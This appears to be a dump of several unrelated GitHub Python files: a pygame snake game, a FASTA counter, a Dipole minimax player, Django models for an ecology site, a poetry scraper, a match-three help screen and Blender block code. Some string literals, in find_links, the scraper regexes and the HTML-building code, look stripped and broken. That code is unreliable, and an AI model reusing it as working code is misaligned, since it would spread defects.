self.speed * self.dy\n\n def eat(self, foodx, foody):\n x = self.elements[0][0]\n y = self.elements[0][1]\n if foodx - 10 <= x <= foodx + 40 and foody - 10 <= y <= foody + 40:\n return True\n return False\n\n def food(self, foodx, foody) :\n for i in range(self.size) :\n x = self.elements[i][0]\n y = self.elements[i][1]\n if collision(foodx, foody, 20, 20, x, y, self.radius) :\n return True\n\n def wall(self, wallx, wally, wallw, wallh) :\n x = self.elements[0][0]\n y = self.elements[0][1]\n if wallx <= x <= wallx + wallw and wally <= y <= wally + wallh:\n return True\n return False\n\nclass Food:\n def __init__(self):\n self.x = random.randint(0, screen_width - 20)\n self.y = random.randint(0, screen_height - 20)\n\n def gen(self):\n self.x = random.randint(0, screen_width - 20)\n self.y = random.randint(0, screen_height - 20)\n\n def draw(self):\n pygame.draw.rect(screen, (34, 173, 48), (self.x, self.y, 20, 20))\n\n\nclass Wall(pygame.sprite.Sprite) :\n def __init__(self, index):\n super().__init__()\n self.index = index\n self.dimensions = (20, random.randint(100, 200))\n self.choose = random.randint(0, 1)\n self.width = self.dimensions[self.choose]\n self.height = self.dimensions[0] if self.choose == 1 else self.dimensions[1]\n #Making walls appear on different parts of screen\n if 
self.index == 1 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 2 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 3 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n elif self.index == 4 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n \n def gen(self) :\n self.width = self.dimensions[self.choose]\n self.height = self.dimensions[0] if self.choose == 1 else self.dimensions[1]\n if self.index == 1 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 2 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(0, screen_height / 2 - self.height)\n elif self.index == 3 :\n self.x = random.randint(0, screen_width / 2 - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n elif self.index == 4 :\n self.x = random.randint(screen_width / 2, screen_width - self.width)\n self.y = random.randint(screen_height / 2, screen_height - self.height)\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n\n def draw(self) :\n pygame.draw.rect(screen, (98, 50, 50), self.rect)\n\nclass Button() :\n def __init__(self, image, x, y):\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n \n def draw(self) :\n screen.blit(self.image, self.rect.topleft)\n pos = pygame.mouse.get_pos()\n if self.rect.collidepoint(pos) :\n return True\n\nall_sprites = pygame.sprite.Group()\n\nsnake = Snake(0, 0)\nfood = Food()\nwall = Wall(1)\nwall1 = Wall(2)\nwall2 = Wall(3)\nwall3 = Wall(4)\n\nall_sprites.add(wall)\n\n#Checking if walls appear on top of each-other\nif wall.rect.colliderect(wall1.rect) :\n wall1.gen()\nelse :\n all_sprites.add(wall1)\n\nif wall1.rect.colliderect(wall2.rect) :\n wall2.gen()\nelse : \n all_sprites.add(wall2)\n\nif wall2.rect.colliderect(wall3.rect) :\n wall3.gen()\nelse : \n all_sprites.add(wall3)\n\nFPS = 60\nd = 5\n\n#Loading images for buttons\nmain_menu_bg_load = pygame.image.load('images/main_menu_snake.jpg')\nmain_menu_bg = Button(main_menu_bg_load, 0, 0)\nmain_menu_play_load = pygame.image.load('images/play_button_snake.png')\nmain_menu_play = Button(main_menu_play_load, (screen_width - main_menu_play_load.get_width()) / 2, 300)\nmain_menu_quit_load = pygame.image.load('images/quit_button_snake.png')\nmain_menu_quit = Button(main_menu_quit_load, (screen_width - main_menu_quit_load.get_width()) / 2, 400)\nmain_menu_restart_load = pygame.image.load('images/restart_button_snake.png')\nmain_menu_restart = Button(main_menu_restart_load, (screen_width - main_menu_restart_load.get_width()) / 2, 300)\n\nclock = pygame.time.Clock()\n\nwhile running:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n if event.key == pygame.K_RIGHT and snake.dx != -d:\n snake.dx = d\n snake.dy = 0\n if event.key == pygame.K_LEFT and snake.dx != d:\n snake.dx = -d\n snake.dy = 0\n if event.key == pygame.K_UP and snake.dy != 
d:\n snake.dx = 0\n snake.dy = -d\n if event.key == pygame.K_DOWN and snake.dy != -d:\n snake.dx = 0\n snake.dy = d\n\n if event.type == pygame.MOUSEBUTTONDOWN and main_menu_play.draw() :\n state = 'play'\n if event.type == pygame.MOUSEBUTTONDOWN and main_menu_quit.draw() :\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN and main_menu_restart.draw() :\n #Reseting all the progress\n screen.fill((0, 0, 0))\n state = 'play'\n snake.size = 0\n snake.speed = 1\n snake.level = 1\n snake.elements.clear()\n snake.elements.append([0, 0])\n snake.dx = d\n snake.dy = 0\n for object in all_sprites :\n object.gen()\n\n if state == 'main menu' :\n main_menu_bg.draw()\n main_menu_play.draw()\n main_menu_quit.draw()\n elif state == 'play' :\n screen.fill((255, 255, 255))\n if snake.elements[0][0] > screen_width :\n snake.elements[0][0] = 0\n if snake.elements[0][0] < 0 :\n snake.elements[0][0] = screen_width\n if snake.elements[0][1] > screen_height :\n snake.elements[0][1] = 0\n if snake.elements[0][1] < 0 :\n snake.elements[0][1] = screen_height\n\n if snake.eat(food.x, food.y):\n food_sound.play()\n snake.is_add = True\n food.gen()\n\n if snake.food(food.x, food.y) :\n food.gen()\n\n for object in all_sprites :\n if snake.wall(object.x, object.y, object.width, object.height) :\n game_over()\n\n if object.rect.colliderect((food.x, food.y, 20, 20)):\n food.gen()\n\n food.draw()\n snake.draw()\n snake.move()\n wall.draw()\n wall1.draw()\n wall2.draw()\n wall3.draw()\n #Score and level text\n score = font.render(str(snake.size), True, (0, 0, 0))\n lvl = font.render(f\"lvl: {str(snake.level)}\", True, (0, 0, 0))\n screen.blit(score, (screen_width - score.get_width() - 10, 10))\n screen.blit(lvl, (screen_width - lvl.get_width() - 10, 30))\n\n elif state == 'game over' :\n main_menu_bg.draw()\n main_menu_restart.draw()\n main_menu_quit.draw()\n\n pygame.display.flip()\n\npygame.quit()","repo_name":"Asylniet/Pyhton3-university","sub_path":"lab8/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":10375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"29749337308","text":"import argparse\nfrom collections import defaultdict\nimport gzip\n\n\ndef fasta_load(fasta_in,string_match,string_count):\n first = True\n for line in fasta_in:\n line = line.strip()\n if line.startswith(';'):\n continue\n elif line.startswith('>') and not first:\n genomes[sequence_name] +=1\n sequence_name = line.split('>')[1].split('|')[0]\n if string_match:\n if string_match in line:\n string_count[sequence_name] += 1\n elif line.startswith('>'):\n sequence_name = line.split('>')[1].split('|')[0]\n if string_match:\n if string_match in line:\n string_count[sequence_name] += 1\n else:\n first = False\n genomes[sequence_name] +=1\n string_count[sequence_name] += 1\n return string_count\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--fasta_seq', action='store', dest='fasta_seq', required=True,\n help='FASTA file')\n parser.add_argument('-s', '--string_match', action='store', dest='string_match', required=False,\n default='', help='Optional: Count number of sequences with \"string\" in ID')\n parser.add_argument('-o', '--output_file', action='store', dest='out_file', required=True,\n help='Output file')\n\n options = parser.parse_args()\n string_count = defaultdict(int)\n genomes = defaultdict(int)\n try: # Detect whether fasta files are .gz or text and read accordingly\n fasta_in = gzip.open(options.fasta_seq,'rt')\n string_count = fasta_load(fasta_in,options.string_match,string_count)\n except:\n fasta_in = open(options.fasta_seq,'r')\n string_count = fasta_load(fasta_in,options.string_match,string_count)\n\n out = open(options.out_file, 'w', newline='\\n', encoding='utf-8')\n out.write(\"Genome_ID\\tNumber_Of_Seqs\\t\"+options.string_match+'\\n')\n for genome_id, sequence_count in sorted(genomes.items(), key=lambda item: item[1], reverse=True):\n if string_count[genome_id] > 0:\n out.write(genome_id+'\\t'+str(sequence_count)+'\\t'+str(string_count[genome_id])+'\\n')\n else:\n out.write(genome_id + '\\t' + str(sequence_count) +'\\n')\n\n\n\n\n\n\n\n\n","repo_name":"NickJD/Bioinformatic-Tools","sub_path":"FASTA/Seq_By_Genome_Counter.py","file_name":"Seq_By_Genome_Counter.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"18735161979","text":"import math\nimport random\n\nfrom games.dipole.player import DipolePlayer\nfrom games.dipole.result import DipoleResult\nfrom games.dipole.state import DipoleState\nfrom games.state import State\nfrom games.dipole.action import DipoleAction\n\n\nclass MinimaxDipolePlayer(DipolePlayer):\n def __init__(self, name):\n self.action_count = 0\n super().__init__(name)\n\n '''\n This heuristic will simply count the maximum number of consecutive pieces that the player has\n '''\n\n def __heuristic(self, state: DipoleState):\n player_score = state._count_captured_pieces(self.get_current_pos())\n opponent_score = state._count_captured_pieces(1 - self.get_current_pos())\n\n player_territory = 0\n opponent_territory = 0\n\n player_captured_pieces = 0\n opponent_captured_pieces = 0\n\n for i in range(state.get_num_rows()):\n for j in range(state.get_num_cols()):\n cell = state.get_grid()[i][j]\n opponent_pos = state.get_positions(i, j)\n\n if cell == -1: # if the cell is empty\n if all(state.get_grid()[n[0]][n[1]] == self.get_current_pos() for n in opponent_pos):\n player_territory += 1\n elif all(state.get_grid()[n[0]][n[1]] == 1 - self.get_current_pos() for n in opponent_pos):\n opponent_territory += 1\n elif cell == self.get_current_pos(): # if the cell is owned by the player\n if any(state.get_grid()[n[0]][n[1]] == 1 - self.get_current_pos() for n in opponent_pos):\n player_captured_pieces += 1\n elif cell == 1 - self.get_current_pos(): # if the cell is owned by the opponent\n if any(state.get_grid()[n[0]][n[1]] == self.get_current_pos() for n in opponent_pos):\n opponent_captured_pieces += 1\n\n return (player_score + player_territory + player_captured_pieces) - (opponent_score + opponent_territory + opponent_captured_pieces)\n\n \"\"\"Implementation of minimax search (recursive, with alpha/beta pruning) :param state: the state for which the \n search should be made :param depth: maximum depth of the search :param alpha: to optimize the search :param beta: \n to optimize the search :param is_initial_node: if true, the function will return the action with max ev, \n otherwise it return the max ev (ev = expected value) \"\"\"\n\n def minimax(self, state: DipoleState, depth: int, alpha: int = -math.inf, beta: int = math.inf,\n is_initial_node: bool = True):\n # first we check if we are in a terminal node (victory, draw or loose)\n if state.is_finished():\n return {\n DipoleResult.WIN: 40,\n DipoleResult.LOOSE: -40,\n DipoleResult.DRAW: 0\n }[state.get_result(self.get_current_pos())]\n\n # if we reached the maximum depth, we will return the value of the heuristic\n if depth == 0:\n return self.__heuristic(state)\n\n # if we are the acting player\n if self.get_current_pos() == state.get_acting_player():\n # very small integer\n value = -math.inf\n selected_action = None\n\n for action in state.get_possible_actions():\n new_state = state.clone()\n new_state.update(action)\n pre_value = value\n value = max(value, self.minimax(new_state, depth - 1, alpha, beta, False))\n if value > pre_value:\n selected_action = action\n if value > beta:\n break\n alpha = max(alpha, value)\n\n return selected_action if is_initial_node else value\n\n # if it is the opponent's turn\n else:\n value = math.inf\n for action in state.get_possible_actions():\n new_state = state.clone()\n new_state.update(action)\n value = min(value, self.minimax(new_state, depth - 1, alpha, beta, False))\n if value < alpha:\n break\n beta = min(beta, value)\n return value\n\n def get_action(self, state: 
DipoleState):\n self.action_count += 1\n\n if self.action_count > 15:\n return DipoleAction(is_pass=True)\n \n # Introduce some randomness in the initial moves\n if self.action_count < 3:\n possible_actions = state.get_possible_actions()\n return random.choice(possible_actions)\n return self.minimax(state, 2)\n\n def event_new_game(self):\n super().event_new_game()\n self.action_count = 0\n\n def event_action(self, pos: int, action, new_state: State):\n pass\n\n def event_end_game(self, final_state: State):\n pass\n","repo_name":"basiliobarbosaESTG/dipole-Game-IA","sub_path":"src/games/dipole/players/minimax.py","file_name":"minimax.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
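The minimax above prunes with alpha/beta bounds and an is_initial_node switch. A toy, self-contained sketch of the same pruning on a hard-coded two-ply tree; the tree, values and function name are invented and none of the Dipole game logic is reproduced:

    import math

    def alphabeta(node, maximizing, alpha=-math.inf, beta=math.inf):
        if isinstance(node, int):        # leaf: static evaluation
            return node
        best = -math.inf if maximizing else math.inf
        for child in node:
            val = alphabeta(child, not maximizing, alpha, beta)
            if maximizing:
                best = max(best, val)
                alpha = max(alpha, best)
            else:
                best = min(best, val)
                beta = min(beta, best)
            if beta <= alpha:            # cutoff: remaining siblings cannot matter
                break
        return best

    print(alphabeta([[3, 5], [6, 9]], True))   # 6 == max(min(3, 5), min(6, 9))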
+{"seq_id":"19977102701","text":"from django.db import models\nimport numpy as np\nimport re\n\n### utilities ###\n\nclass IconObj(object):\n \"\"\"Informations to draw an icon linking to another subject\n (on a causality diagram)\"\"\"\n def __init__(self,title,text,pic,color,pos,size,target_id,node_id=None):\n self.title = title\n self.text = text\n self.picture = pic\n self.color = color\n self.pos = pos\n self.size = size\n self.target_id = target_id\n self.node_id = node_id\n \n def norm(self,offset,factor):\n self.pos = [factor*(self.pos[i]+offset[i]) for i in range(2)]\n self.pos = [int(i) for i in self.pos]\n self.size = int(factor*self.size)\n \nclass ArrowObj(object):\n \"\"\"To draw arrows on a causality diagram\"\"\"\n def __init__(self,pos,color):\n self.pos = pos\n self.color = color\n \n def norm(self,offset,factor):\n pos=[factor*(offset[i[0]%2]+i[1]) for i in enumerate(self.pos)]\n self.pos = [int(i) for i in pos]\n \nclass DiagramObj(object):\n \"\"\"All information needed to draw a causality diagram\"\"\"\n def __init__(self,name,icons,pairs,margin,width,height,line_width,\n text_size_factor=3/2):\n \n text_size=text_size_factor*max([i.size for i in icons])\n \n offsetX = - min([i.pos[0]-text_size for i in icons])\n offsetY = - min([i.pos[1]-text_size for i in icons])\n offset = (offsetX,offsetY)\n \n current_width = max([i.pos[0]+text_size for i in icons]) + offset[0]\n current_height = max([i.pos[1]+text_size for i in icons]) + offset[1]\n \n factor = min((width-2*margin)/current_width,\n (height-2*margin)/current_height)\n offset=[i+margin/factor for i in offset]\n \n vects= [np.array([p[1].pos[0]-p[0].pos[0],p[1].pos[1]-p[0].pos[1]]) \n for p in pairs]\n lengths = [np.sqrt(np.dot(v,v)) for v in vects]\n start_end = [(p[0].size/le,(le-p[1].size)/le) for p,le in zip(pairs,lengths)]\n pos = [[p[0].pos[i%2]+se[i//2]*v[i%2] for i in range(4)] for p,se,v in zip(pairs,start_end,vects)]\n colors = [p[0].color for p in pairs]\n \n arrows = [ArrowObj(*i) for i in zip(pos,colors)]\n \n [i.norm(offset,factor) for i in icons]\n [i.norm(offset,factor) for i in arrows]\n \n self.name=name\n self.width = int(width)\n self.height = int(height)\n self.line_width = int(line_width)\n self.icons = icons\n self.arrows = arrows\n self.lines = [i for i in arrows]\n self.text_size = int(factor*text_size)\n \n self.offset=offset\n self.factor=factor\n \n def add_arrows(self,arrows,lines):\n arrows=[ArrowObj(*i) for i in arrows]\n lines = [ArrowObj(*i) for i in lines]\n [i.norm(self.offset,self.factor) for i in arrows]\n [i.norm(self.offset,self.factor) for i in lines]\n self.arrows.extend(arrows)\n self.lines.extend(lines)\n \nclass Dummy(object):\n def __init__(self,dict):\n self.__dict__.update(dict)\n\ndef find_links(s):\n offset=0\n a=re.findall(\"http[^ ]*\",s)\n b=re.split(\"http[^ ]*\",s)\n c=[]\n for i,j in zip(a,b[:-1]):\n if re.search(\"\"\"%s\"%(i,i))\n else:\n c.append(i)\n res=b[0]\n for i,j in zip(c,b[1:]):\n res+=i+j\n return res\n \nPOSITIONS = (\n (\"L\",\"Left\"),\n (\"R\",\"Right\"),\n (\"LT\",\"Left Top\"),\n (\"RT\",\"Right Top\"),\n (\"LB\",\"Left Bottom\"),\n (\"RB\",\"Right Bottom\"),\n (\"BR\",\"Bottom Right\"),\n (\"BL\",\"Bottom Left\"),\n (\"BC\",\"Bottom Center\")\n)\n \n#################\n\n\n### Picture storage ###\n\nclass PictureDim(models.Model):\n '''Specifies dimensions of an image'''\n # height and width\n height= models.IntegerField(default=0, blank=True)\n width= models.IntegerField(default=0, blank=True)\n \n # rectangle to crop an image\n left= 
models.IntegerField(default=0, blank=True)\n right= models.IntegerField(default=0, blank=True)\n top= models.IntegerField(default=0, blank=True)\n bottom= models.IntegerField(default=0, blank=True)\n\n \nclass Picture(models.Model):\n title = models.CharField(max_length=400, blank=True)\n source = models.CharField(max_length=300, blank=True)\n picture = models.ImageField(upload_to = \"ecosyn/pictures/\",\n null = True, blank=True)\n link = models.CharField(max_length=400, blank=True)\n dims = models.ForeignKey(PictureDim, on_delete= models.SET_NULL, \n null=True, blank=True)\n def __str__(self):\n return self.title\n \n def resize(self,width=None,height=None):\n pic=self.picture\n size_pic=np.array([pic.width,pic.height])\n d=self.dims\n if d is not None:\n width = width if width is not None else d.width\n height = height if height is not None else d.height\n if width==0:\n width=pic.width\n if height==0:\n height=pic.height\n size_crop=size_pic-np.array([d.left+d.right, d.top+d.bottom])\n if min(size_crop)<=0:\n size_crop=size_pic\n margins=[d.top,0,0,d.left]\n else:\n width = width if width is not None else size_pic[0]\n height = height if height is not None else size_pic[1]\n size_crop=size_pic\n margins=[0]*4\n\n factor = min(np.array([width,height])/size_crop)\n size_pic=[int(i*factor) for i in size_pic]\n size_crop=[int(i*factor) for i in size_crop]\n margins=[int(-i*factor) for i in margins]\n margins=\"%dpx %dpx %dpx %dpx\"%tuple(margins)\n print(size_pic,size_crop,margins)\n return (size_pic,size_crop,margins)\n \n \nclass Icon(models.Model):\n title = models.CharField(max_length=100, blank=True)\n source = models.CharField(max_length=200, blank=True)\n picture = models.ImageField(upload_to = \"ecosyn/icons/\",\n null = True, blank=True)\n def __str__(self):\n return self.title\n\n\n### Main classes ###\n \n \nclass SujetOrSecteur(models.Model):\n \"\"\" Abstract Class for storing topics or reports (ex: \"Le charbon\")\n \n The main content is stored in objects\n \n Attributes:\n header_picture : will be placed above the title\n left_picture : optionnally to be placed on the left_picture\n caused_by : topics causing the present issue\n consequence : topics caused by the present issue\n \"\"\"\n \n name = models.CharField(max_length = 100)\n title = models.CharField(max_length=200)\n short_description = models.CharField(max_length=400, blank=True)\n date_created = models.DateField(auto_now_add = True)\n \n header_picture = models.ForeignKey(Picture, null = True, blank = True,\n on_delete = models.SET_NULL,\n related_name=\"+\")\n \n icon_picture = models.ForeignKey(Icon, null = True, blank = True,\n on_delete = models.SET_NULL,\n related_name=\"+\")\n \n def __str__(self):\n return self.name\n\n def get_sections(self):\n sec=self.section_set.order_by(\"order\").all()\n res=[]\n order=0\n temp=[]\n for i in sec:\n if i.order!=order:\n res.append(temp)\n temp=[i]\n order=i.order\n else:\n temp.append(i)\n res.append(temp)\n return res\n \n class Meta:\n abstract = True\n \n \nclass Secteur(SujetOrSecteur):\n \"\"\" Subclass of for storing reports (ex: \"Le charbon\")\n \n The main content is stored in objects\n \n Attributes:\n name : used internally\n title : Title displayed on the site\n short_description : displayed under the title\n header_picture : will be placed above the title\n left_picture : optionnally to be placed on the left_picture\n \"\"\"\n color = models.CharField(max_length = 50, default=\"grey\")\n order = models.IntegerField(default = 0) \n \n \nclass 
Sujet(SujetOrSecteur):\n \"\"\" Class for storing topics (ex: \"Le charbon\")\n \n The main content is stored in objects\n \n Attributes:\n header_picture : will be placed above the title\n left_picture : optionnally to be placed on the left_picture\n causes : topics causing the present issue\n consequences : topics caused by the present issue\n \"\"\"\n \n secteur = models.ForeignKey(Secteur, null = True, blank=True,\n on_delete = models.SET_NULL)\n\n \n def __str__(self):\n return self.name\n \n def get_cause_diagram(self, width=500, height = 500):\n \"\"\" Prepare the diagram of issues that cause the present ones\n \n pics : icon of the causes\n colors : the corresponding Sector color\n text : a short description of the cause\n pos : position of the cause image\n sizes : size of the cause image\n \n \"\"\"\n size_center= 7\n default_size = 3\n distance = 15\n line_width = 2\n margin = 5\n side_angle = 0.7\n \n causes = self.causes.all()\n lien_causes = [lien.cause for lien in causes]\n \n if len(causes)>0:\n # computing position and size of the graphic elements\n sizes= [lien.relative_share for lien in causes]\n sizes= [np.sqrt(i) if i is not None else default_size for i in sizes]\n sizes= [min(i,distance-size_center-2) for i in sizes]\n \n titles=[c.title for c in lien_causes]\n pics=[c.icon_picture for c in lien_causes]\n colors=[\"grey\" if c.secteur is None else \n c.secteur.color for c in lien_causes]\n text = [lien.cause_description for lien in causes]\n ids = [c.id for c in lien_causes]\n \n \n angle=[0]\n angle.extend([i+j for i,j in zip(sizes[:-1],sizes[1:])])\n angle=np.cumsum(angle)*(2*np.pi/(2*sum(sizes)))\n angle += np.pi - angle[-1]/2\n angle *= side_angle/2 \n angle += (1-side_angle)/2*np.pi + np.pi/2\n pos = [(distance*np.cos(i),distance*np.sin(i)) for i in angle]\n \n # storing as object list \n icons=[IconObj(*i) for i in \n zip(titles,text,pics,colors,pos,sizes,ids)]\n else:\n icons=[]\n \n try:\n color_center=self.secteur.color \n except AttributeError:\n color_center=\"grey\"\n center = IconObj(self.title,self.short_description,\n self.icon_picture,color_center,\n (0,0),size_center,self.id)\n \n\n con = self.consequences.all()\n \n if len(con)>0:\n # computing position and size of the graphic elements\n titles2 =[lien.consequence.title for lien in con]\n text2 = [lien.consequence_description for lien in con]\n pics2 =[lien.consequence.icon_picture for lien in con]\n colors2 =[\"grey\" if lien.consequence.secteur is None else \n lien.consequence.secteur.color for lien in con]\n ids2 = [lien.consequence.id for lien in con]\n\n angle2=np.linspace(0,2*np.pi,len(con),endpoint=False)\n angle2 += np.pi - angle2[-1]/2\n angle2 *= side_angle/2 \n angle2 += (1-side_angle)/2*np.pi - 1/2*np.pi\n pos2 = [(distance*np.cos(i),distance*np.sin(i)) for i in angle2]\n sizes2= [default_size]*len(con)\n \n # storing as object list \n icons2=[IconObj(*i) for i in \n zip(titles2,text2,pics2,colors2,pos2,sizes2,ids2)]\n else:\n icons2=[]\n \n pairs=[(i,center) for i in icons]\n pairs.extend([(center,i) for i in icons2])\n \n icons.extend(icons2)\n icons.append(center)\n \n if len(icons)==0:\n return False\n\n diag=DiagramObj(\"causes\",icons,pairs,margin,width,height,line_width,\n text_size_factor=2)\n self.cause_diagram = diag\n return True\n \n \nclass Page(SujetOrSecteur):\n \"\"\" Subclass of for storing page content \"\"\"\n pass\n\n \n### Serve content to the main classes ###\n\n \nclass Section(models.Model):\n \"\"\" Class to store a section of a webpage\n \n Attributes:\n title : 
subtitle of the section (optional)\n section_text : \n picture: contains a picture and some metadata\n order : order of the section in the topic page\n \"\"\"\n\n title = models.CharField(max_length=200, blank=True)\n subtitle = models.CharField(max_length=200, blank=True)\n text = models.TextField(default=\"\", blank=True)\n \n order = models.PositiveSmallIntegerField()\n opinion = models.BooleanField(blank=True, default = False)\n background = models.ForeignKey(Picture, on_delete = models.SET_NULL,\n null = True, blank=True)\n \n sujet = models.ForeignKey(Sujet, on_delete = models.CASCADE,\n related_name = \"section_set\", null = True, blank=True)\n secteur = models.ForeignKey(Secteur, on_delete = models.CASCADE,\n related_name = \"section_set\", null = True, blank=True)\n page = models.ForeignKey(Page, on_delete = models.CASCADE,\n related_name = \"section_set\", null = True, blank=True)\n \n def __str__(self):\n s=\"\"\n if self.sujet is not None:\n s = \"Sujet: %s\"%(self.sujet.name)\n elif self.secteur is not None:\n s = \"Secteur: %s\"%(self.secteur.name)\n elif self.page is not None:\n s = \"Page: %s\"%(self.page.name)\n max_len=25\n s=\"%s (%d) %s\"%(s,self.order,self.title[:max_len])\n if len(self.title)>=max_len:\n s+=\"...\"\n return s\n \n def get_text(self):\n res=[]\n last=False\n text=self.text\n if text==\"\":\n return text\n text=find_links(self.text)\n for i in text.split('\\n'):\n boo=i.startswith('-')\n if boo:\n i = \"\\n<li>%s</li>\"%i[1:]\n else:\n i = \"\\n\" + i\n if not last and boo: \n i = \"\\n<ul>\" + i[1:]\n elif last and not boo:\n i = \"\\n</ul>\" + i\n last=boo\n \n res.append(i)\n if last:\n res.append(\"</ul>\")\n res = \"\".join(res)\n res=res.replace(\"\\r\\n\",\"<br/>
',html,re.DOTALL)\n for poetry_html in match_poetry_list:\n poetry_lines_list = re.findall(r\"
(.*?)
\",poetry_html,re.DOTALL) \n poetry_text=\"\"\n for line in poetry_lines_list:\n if line.find(u\"作者\")>=0 or line.find(u\"分类\")>=0 or line.find(\"href\")>=0:\n continue\n if line.find(\"(\")>=0:\n line=re.sub(r'\\(.*?\\)','',line)\n if line.find(\"[\")>=0:\n line=re.sub(r'\\[.*?\\]','',line) \n poetry_text += line \n poetry.append(poetry_text) \n page += 1\n if html.find(u\"末页\")==-1:\n break \n poetryfile = codecs.open(ffile,encoding='utf-8',mode='w')\n poetryfile.write(u\"\\r\".join(poetry))\n poetryfile.close()\n\n","repo_name":"one-leaf/tensorflow","sub_path":"5_test/4_nlp_poetry/getshixue.py","file_name":"getshixue.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"}
+{"seq_id":"14315997699","text":"import pygame\nimport sys\nfrom pygame.locals import *\nimport random\nimport time\nimport datetime\nimport sqlite3\nimport math\nimport sys\n\n\npygame.init()\npygame.display.set_caption('Jewel quest')\nscreen = pygame.display.set_mode((400, 425),0,32)\n\nwidth = 400\nheight = 400\nscoreboard_height = 25\n\n\nstart_ticks=pygame.time.get_ticks() \n\nclock = pygame.time.Clock()\n\nfont = pygame.font.SysFont(None, 30)\ncandy_colors = ['blue', 'green', 'orange', 'pink', 'purple', 'red', 'teal', 'yellow'] \ncandy_width = 40\ncandy_height = 40\ncandy_size = (candy_width, candy_height)\n\ndef draw_text(text, font, color, surface, x, y):\n textobj = font.render(text, 1, color)\n textrect = textobj.get_rect()\n textrect.topleft = (x, y)\n surface.blit(textobj, textrect)\n \n \ndef complete_level_screen():\n font = pygame.font.Font(None, 32)\n running = True\n while running:\n screen.fill((0, 255, 153))\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n draw_text('Level complete', font, (0,0,0), screen, 90, 200)\n \n pygame.display.update()\n\ndef help():\n running = True\n while running:\n screen.fill((255, 242, 145))\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n draw_text('Rules', font, (0,0,0), screen, 80, 40)\n draw_text('Classic match-tree rules', font, (0,0,0), screen, 80, 80)\n draw_text('Time: Play until time end', font, (0,0,0), screen, 80, 120)\n draw_text('Score *: 3 level with limit score', font, (0,0,0), screen, 80, 160)\n pygame.display.update() \n ","repo_name":"Kl1rik/PPOIS_Spring","sub_path":"Lab 3.8/HelpScreen.py","file_name":"HelpScreen.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"72407781511","text":"def transpose(array):\n array = array[:] # make copy to avoid changing original\n n = len(array)\n for i, row in enumerate(array):\n array[i] = row + [None for _ in range(n - len(row))]\n\n array = list(zip(*array))\n\n for i, row in enumerate(array):\n array[i] = [elem for elem in row if elem is not None]\n array_clear = []\n for line in array:\n if len(line) > 0:\n array_clear.append(line)\n\n return array_clear\n","repo_name":"AVVasiliev/graphics-visualizer","sub_path":"graphics_app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"30539382315","text":"import bpy\nimport mathutils\n\nclass Block:\n \"\"\"A basic block with a single texture\n \n This class should be inherited by every other block class\n \"\"\"\n\n def __init__(self, id, unlocalizedName, textureName):\n self._id = id\n self._unlocalizedName = unlocalizedName\n self._textureName = textureName\n \n def getBlockTexturePath(self, textureName):\n return bpy.path.abspath(\"//textures/blocks/\" + textureName + \".png\")\n\n def make(self, x, y, z, metadata):\n obj = self.makeObject(x, y, z, metadata)\n self.makeUVMap(obj, metadata)\n self.applyMaterial(obj, metadata)\n \n def makeObject(self, x, y, z, metadata):\n mesh = bpy.data.meshes.new(name=\"Block\")\n mesh.from_pydata([[-0.5,-0.5,-0.5],[0.5,-0.5,-0.5],[-0.5,0.5,-0.5],[0.5,0.5,-0.5],[-0.5,-0.5,0.5],[0.5,-0.5,0.5],[-0.5,0.5,0.5],[0.5,0.5,0.5]],[],[[0,1,3,2],[4,5,7,6],[0,1,5,4],[0,2,6,4],[2,3,7,6],[1,3,7,5]])\n mesh.update()\n\n obj = bpy.data.objects.new(\"Block\", mesh)\n obj.location.x = x + 0.5\n obj.location.y = y + 0.5\n obj.location.z = z + 0.5\n obj.blockId = self._id\n obj.blockMetadata = metadata\n bpy.context.scene.objects.link(obj)\n\n activeObject = bpy.context.scene.objects.active\n bpy.context.scene.objects.active = obj\n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.select_all(action='SELECT')\n bpy.ops.mesh.normals_make_consistent(inside=False)\n bpy.ops.object.editmode_toggle()\n bpy.context.scene.objects.active = activeObject\n \n return obj\n \n def makeUVMap(self, obj, metadata):\n obj.data.uv_textures.new();\n obj.data.uv_layers[0].data.foreach_set(\"uv\", [0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1])\n \n def 